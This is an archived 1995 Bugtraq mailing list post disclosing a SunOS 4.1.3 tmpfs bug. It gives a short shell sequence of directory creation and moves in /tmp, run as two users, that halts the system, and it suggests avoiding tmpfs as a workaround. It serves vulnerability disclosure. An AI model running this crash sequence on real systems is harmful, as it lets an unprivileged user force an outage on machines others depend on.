Bugtraq mailing list archives
Another tmpfs bug in SunOS 4
From: Arfst.Ludwig () luxor in-berlin de (Arfst Ludwig)
Date: Sat, 2 Dec 1995 23:50:40 +0100
Hi! Unprivileged users can crash the system such that a power down power up cyle is needed. Vulnerable OS is (at least) SunOS 4.1.3. With the right permissions (umask) the following sequence crahes the system. The kernel does not panic, nor the abort sequece enters the boot promt, the system is halted, need to power down. 8<------------------------- cut here ------------------------- user1> cd /tmp user1> mkdir foo user1> su user2 user2> mkdir foo/bar user2> touch foo/bar/{plop,blup} user2> exit user1> cd foo user1> mv bar .. 8<------------------------- cut here ------------------------- /tmp's permissons are drwxrwxrwt root wheel I have not explored this bug very much because of the ungracefully consequences. Workaround: Avoid using (the marvelous) TMPFS filesystems :-( or (IMHO even worse) switch to Solaris 2 ? Cheers, Arfst ______________________________________________________________________ __ (00) Arfst Ludwig \`\/ E-Mail: Arfst.Ludwig () luxor in-berlin de "" carpe diem
Current thread:
- Cracked: WINDOWS.PWL Michael S. Fischer (Dec 05)
- Another tmpfs bug in SunOS 4 Arfst Ludwig (Dec 02)
- Re: Another tmpfs bug in SunOS 4 Pete Shipley (Dec 07)
- little whole on Suns concerning /dev/kbd Arfst Ludwig (Dec 02)
- Re: little whole on Suns concerning /dev/kbd Pete Shipley (Dec 07)
- Re: Cracked: WINDOWS.PWL [most services accessed by any version Rich Graves (Dec 05)
- fork() Alex Leipold (Dec 10)
- Re: fork() Scott Barman (Dec 11)
- Re: fork() Tom Jones (Dec 12)
- SECURITY: Announcing Splitvt 1.6.3 Sam Lantinga (Dec 13)
- Re: SECURITY: Announcing Splitvt 1.6.3 Alex Leipold (Dec 14)
- Re: fork() Scott Barman (Dec 11)
- Re: fork() JaDe (Dec 11)
- Another tmpfs bug in SunOS 4 Arfst Ludwig (Dec 02)